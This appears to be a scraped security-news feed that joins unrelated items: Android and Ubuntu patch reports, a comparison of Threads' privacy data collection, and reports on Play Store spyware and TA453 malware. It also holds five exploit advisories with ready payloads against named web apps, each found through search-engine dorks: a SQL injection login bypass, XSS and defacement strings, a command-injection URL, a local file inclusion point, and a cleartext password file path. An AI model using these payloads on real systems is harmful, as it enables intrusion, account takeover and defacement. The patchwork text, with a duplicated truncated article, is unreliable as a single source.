Google has released its monthly security updates for the Android operating system, addressing 46 new software vulnerabilities. Among these, three vulnerabilities have been identified as actively exploited in targeted attacks.
One of the vulnerabilities tracked as CVE-2023-26083 is a memory leak flaw affecting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. This particular

Google has released its monthly security updates for the Android operating system, addressing 46 new software vulnerabilities. Among these, three vulnerabilities have been identified as actively exploited in targeted attacks.

One of the vulnerabilities tracked as CVE-2023-26083 is a memory leak flaw affecting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. This particular vulnerability was exploited in a previous attack that enabled spyware infiltration on Samsung devices in December 2022.

This vulnerability was regarded as serious enough to prompt the Cybersecurity and Infrastructure Security Agency (CISA) to issue a patching order for federal agencies in April 2023.

Another significant vulnerability, identified as CVE-2021-29256, is a high-severity issue that affects specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers. This flaw permits an unprivileged user to gain unauthorized access to sensitive data and escalate privileges to the root level.

The third exploited vulnerability, CVE-2023-2136, is a critical-severity bug discovered in Skia, Google's open-source multi-platform 2D graphics library. It was initially disclosed as a zero-day vulnerability in the Chrome browser and allows a remote attacker who has taken over the renderer process to perform a sandbox escape and implement remote code on Android devices.

Besides these, Google's July Android security bulletin highlights another critical vulnerability, CVE-2023-21250, affecting the Android System component. This issue can cause remote code execution without user interaction or additional execution privileges, making it particularly precarious.

These security updates are rolled out in two patch levels. The initial patch level, made available on July 1, focuses on core Android components, addressing 22 security defects in the Framework and System components.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

The second patch level, released on July 5, targets kernel and closed source components, tackling 20 vulnerabilities in Kernel, Arm, Imagination Technologies, MediaTek, and Qualcomm components.

It's important to note that the impact of the addressed vulnerabilities may extend beyond the supported Android versions (11, 12, and 13), potentially affecting older OS versions no longer receive official support.

Google has further launched particular security patches for its Pixel devices, dealing with 14 vulnerabilities in Kernel, Pixel, and Qualcomm components. Two of these critical weaknesses could result in privilege elevation and denial-of-service attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities

Ubuntu Security Notice 6205-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6205-1July 06, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1103-gke      5.4.0-1103.110   linux-image-gke                 5.4.0.1103.108   linux-image-gke-5.4             5.4.0.1103.108After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6205-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1103.110

Ubuntu Security Notice USN-6205-1

DANGEROUS MAILER-CLONED version 2.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403                                    || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] all users and passwords saved as clear text[+] use payload : /storage/info.txt[+] login : /login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DANGEROUS MAILER-CLONED 2.0 Information Disclosure

DaillyTools suffers from a remote command execution vulnerability.

    ====================================================================================================================================| # Title     : DaillyTools v1 command execution Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://github.com/islamoc/DaillyTools                                                                              || # Dork      : Coded by Mennouchi Islam Azeddine                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : PHP_Comments.php[+] Line : 20      Function Name : exec      Variables     :$arr[+] PHP_Comments.php?arr= pwd Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DaillyTools Remote Command Execution

CakePHP Test Suite version 2.7.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CakePHP Test Suite v2.7.0 Xss Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://cakephp.org/                                                                                               |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] create new user and post comment or in search box use payload [+] http://127.0.0.1/forum.groupethika.com/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CakePHP Test Suite 2.7.0 Cross Site Scripting

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected file : index.php      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] LFI : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : AGVirtues Galeria v2.0 Auth By Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : galeria/album.php?id=                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass : ADMIN' OR 1=1#[+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AGVirtues Galeria 2.0 SQL Injection

Want to try out Meta’s new social media app? Here’s more context on what personal data is collected by Threads and similar social media apps.

Meta's long-awaited Twitter alternative is here, and it's called Threads. The new social media app launches at a time when alternatives, like Bluesky, Mastodon, and Spill, are vying for users who are dissatisfied with Elon Musk's handling of Twitter's user experience, with its newly introduced rate limits and an uptick in hate speech.

Meta owns Facebook, Instagram, and WhatsApp, so the company’s attempt to recreate an online experience similar to Twitter is likely to attract plenty of normies, lurkers, and nomadic shitposters. Threads uses the AT Protocol developed by Bluesky, and Meta is working to incorporate Threads as part of the online Fediverse, a group of shared servers where users can interact across multiple platforms.

If you’re hesitant to share your personal data with a company on the receiving end of a billion dollar fine, that’s understandable. For those who are curious, however, here’s what we know about the service’s privacy policy, what data you hand over when you sign up, and how it compares to the data collected by other options.

Threads

Threads (Android, Apple) potentially collects a wide assortment of personal data that remains connected to you, based on the information available in Apple’s App Store, from your purchase history and physical address to your browsing history and health information. “Sensitive information” is also listed as a type of data collected by the Threads app. Some information this could include is your race, sexual orientation, pregnancy status, and religion as well as your biometric data.

Threads falls under the larger privacy policy covering Meta’s other social media platforms. Want to see the whole thing? You can read it for yourself here. There’s one caveat, though. The app has a supplemental privacy policy that’s also worth reading. A noteworthy detail from this document is that while you’re able to deactivate your Threads account whenever, you must delete your Instagram if you fully want to delete your Threads account.

Below is all the data collected by Threads that’s mentioned in the App Store. Do you have the Facebook or Instagram app on your phone? Keep in mind that this data collection by Meta is comparable to the data those apps collect about you.

For Android users, the Google Play Store doesn’t require you to hand over the same amount of extensive data to try out Threads. You have more control than Apple users, since you can granularly toggle what personal data is shared with apps.

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ ( Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Analytics:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History, Financial Info, Payment Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**App Functionality:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History)
*   _Financial Info_ (Payment Info, Credit Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Other Purposes:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

Bluesky

Looking for an app that collects less personal data? Bluesky (Android, Apple) is a buzzy Twitter alternative started by Twitter founder Jack Dorsey and managed by CEO Jay Graber. Bluesky uses the AT Protocol that it created. Like Mastodon already does and Threads soon will, Bluesky incorporates the Fediverse servers as its backbone. The app is currently invite-only, but it does not currently collect anywhere near as much information as Threads or Twitter.

For Bluesky, the data that’s linked to you is focused on app functionality, like remembering your email and user ID, or access to photos and videos on your device so you can post memes. Here’s where you can find more info about Bluesky’s privacy policy. Keep in mind the service is still new and adding features, so there will likely be changes as it evolves.

Below is all the data collected by Bluesky that’s mentioned in the App Store. (Remember that this is only for iPhone owners. If you use an Android smartphone, you have more control over what data is shared.)

Data Linked to You

**App Functionality:**

*   _Contact Info_ (Email Address)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)

Data Not Linked to You

**Analytics:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

Mastodon

What if you want a social media app that doesn’t suck up all your personal data? **Mastodon** (Android, Apple) might be a good option for you. Originally launched in 2016 by Eugen Rochko, Mastodon uses a decentralized protocol that’s different from Threads and Bluesky, called ActivityPub. It’s part of the Fediverse of shared servers. Mastodon is not exactly a new pick; it has positioned itself for years as an alternative to Twitter. (Remember, 2023 isn’t the first time users have considered ditching Twitter for something new and exciting.)

Are you trying it out for the first time? Here’s a great guide to getting started on Mastodon. There’s a bit of a learning curve with this one.

Below is all the data collected by Mastodon that’s mentioned in the App Store.

_\*In the style of Taylor Swift.\*_

\[Blank Space\]

That's right, the Mastodon app for iOS won't collect any data from your device. For Android owners, the app may share your name and email address with other companies.

If you don't like the official Mastodon apps for any reason, you can always try alternative apps with unique interfaces and features. Just be on the lookout for the privacy policies and data collection for those apps, since they don't have to commit to zero-data collection the way the official ones do.

Spill

Are you part of (or a fan of) Black Twitter and on the search for a new posting platform, preferably one that’s inclusive and voicey? Spill (Apple) is a Black-owned social media app that’s made with diverse communities in mind, specifically people of color. It was founded by Alphonzo “Phonz” Terrell and Devaris Brown, who both used to work at Twitter, and it launched earlier this year. Spill is not part of the Fediverse of shared servers.

Spill is currently invite-only, but you can sign up for the waiting list. While Spill does gather sensitive info, the other aspects of its data collection are not as extensive as Threads. Here’s the full privacy policy you can read over.

Below is all the data collected by Spill that’s mentioned in the App Store. It’s worth noting that Spill’s dev team is working on an Android app, but it’s not yet available to use.

Data Linked to You

**Developer's Advertising or Marketing:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Analytics:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Product Personalization:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**App Functionality:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Other Purposes:**

*   _Contact Info_ (Email Address, Phone Number)

Hive Social

It’s a bit smaller than other platforms, but Hive Social (Android, Apple) is another contender for your attention span that’s particularly popular with gamers. This app is not part of the Fediverse. Nostalgic for the days when curated music would automatically play when a person visited your profile? This feature is one way Hive differentiates itself from Twitter, along with a built-in Q&A feature that lets your followers ask you questions (sometimes anonymously) that you can answer in posts to your feed. Want to give Hive a try? Check out our guide with tips for getting started.

The app collects information about you for functionality and analytics, but it’s not connected specifically to you. Learn more about what data the app uses by taking a look at its privacy policy.

Below is all the data collected by Hive Social that’s mentioned in the App Store for iPhone owners. (Have a Google Pixel or other Android device in your pocket? You can go into your privacy settings for more control over what data Hive collects.)

Data Not Linked to You

**Analytics:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

What About Twitter?

It may seem like Threads collects a ton of personal data. (Because it does!) For more context, let’s go over what Twitter asks for as well. Twitter (Android, Apple) keeps plenty of data that’s linked to users and used to track you, like your purchase history and browsing history. With that in mind, the app does not list “sensitive information” as one of the disclosed categories of data collection. Check out its full privacy policy for an in-depth breakdown.

Below is all the data collected by Twitter that’s mentioned in the App Store. (Escaped from Apple’s walled garden? The Android app for Twitter still collects some personal data, like your precise location and web browsing history, unless you adjust your privacy settings.)

Data Used to Track You

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Performance Data)

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

**Analytics:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contacts_
*   _User Content_ (Photos or Videos, Audio Data, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data)

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Phone Number)
*   _Contacts_
*   _User Content_
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**Other Purposes:**

*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Photos or Videos)
*   Search History
*   _Identifiers_ (User ID)

Data Not Linked to You

**Third-Party Advertising:**

*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Other Data_

**Analytics:**

*   _User Content_ (Emails or Text Messages)
*   _Other Data_

**App Functionality:**

*   _Contact Info_ (Physical Address)
*   _User Content_ (Emails or Text Messages)
*   _Other Data_

How Threads' Privacy Policy Compares to Twitter's (and Its Rivals')

By Waqas
Mobile security solutions provider Pradeo’s security researchers have shared details of the spyware they discovered hiding on the…
This is a post from HackRead.com Read the original post: China-Linked Spyware Found in Google Play Store Apps, 2m Downloads

According to the report authored by Roxane Suau and published on July 6th, 2023, Pradeo’s behavior analysis engine recently detected two apps (File Recovery and Data Recovery, with 1 million installations, and File Manager, with 500,000 installations) containing hidden spyware, which may have impacted up to 1.5 million users.

Interestingly, both were created by the same developer. The malicious apps appeared to be harmless file management software, but in reality, they showcased malicious behaviour. These apps can self-launch without user interaction and secretly exfiltrate sensitive user data to several malicious servers in China.

Malicious apps (Pradeo)

**What Data Did These Apps Collect?**

The app profiles on the Google Play Store state that they don’t collect any data from the device, but according to Pradeo’s blog post, these are false claims. Research revealed that the apps collected highly personal data from their targets and transferred it to over one hundred different destinations, all of which were in China and were malicious.

The spyware apps collected the following data:

*   OS version number
*   Device brand/model
*   Real-time user location
*   Network provider’s name
*   SIM provider’s network code
*   Mobile phone’s country code
*   Pictures, video, and audio content
*   Device’s contact lists (all linked accounts, email and social networks)

**How Do the Apps Trap Users?**

The hacker has used various techniques to make these apps appear legitimate. For instance, spyware shows a large user base but doesn’t feature any reviews. Researchers believe that the hacker must have used mobile device emulators or installed farms to show huge numbers and improve the apps’ ranking on the store.

Another tactic is minimal user interaction since the apps can launch automatically when the system starts. So, they can continue their malicious operations even if the app isn’t in use. Also, these apps aren’t visible on the home screen, and their icon remains hidden to prevent uninstallation.

**How to Stay Safe?**

Although Google has removed these apps, if you have downloaded and installed them from a third-party store, delete them immediately and never download apps without any reviews, despite having a large user base. Also, don’t forget to go through their reviews, if there are any, to detect foul play.

Organizations should automate mobile detection and response by vetting apps and determining if they comply with their security policies.

1.  SmugX: Chinese Hackers Targeting Embassies in Europe
2.  New Vishing Attack Spreading FakeCalls Android Malware
3.  Chinese Malware Hits European Healthcare via USB Drives
4.  Goldoson Android Malware in 60 Apps with 100M Downloads
5.  Chinese Sharp Panda Group Unleashes SoulSearcher Malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

China-Linked Spyware Found in Google Play Store Apps, 2m Downloads

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.
"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.
"When given the opportunity, TA453

Endpoint Security / Malware

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.

"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.

"When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest."

TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).

In the attack sequence discovered by the enterprise security firm in mid-May 2023, the hacking crew sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs that delivered a malicious link to a Google Script macro that would redirect the target to a Dropbox URL hosting a RAR archive.

Present within the file is an LNK dropper that kicks off a multi-stage procedure to ultimately deploy GorjolEcho, which, in turn, displays a decoy PDF document, while covertly awaiting next-stage payloads from a remote server.

But upon realizing that the target is using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN application, but in reality, is an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

NokNok, for its part, fetches as many as four modules that are capable of gathering running processes, installed applications, and system metadata as well as setting persistence using LaunchAgents.

The modules "mirror a majority of the functionality" of the modules associated with CharmPower, with NokNok sharing some source code overlaps with macOS malware previously attributed to the group in 2017.

Also put to use by the actor is a bogus file-sharing website that likely functions to fingerprint visitors and act as a mechanism to track successful victims.

"TA453 continues to adapt its malware arsenal, deploying novel file types, and targeting new operating systems," the researchers said, adding the actor "continues to work toward its same end goals of intrusive and unauthorized reconnaissance" while simultaneously complicating detection efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google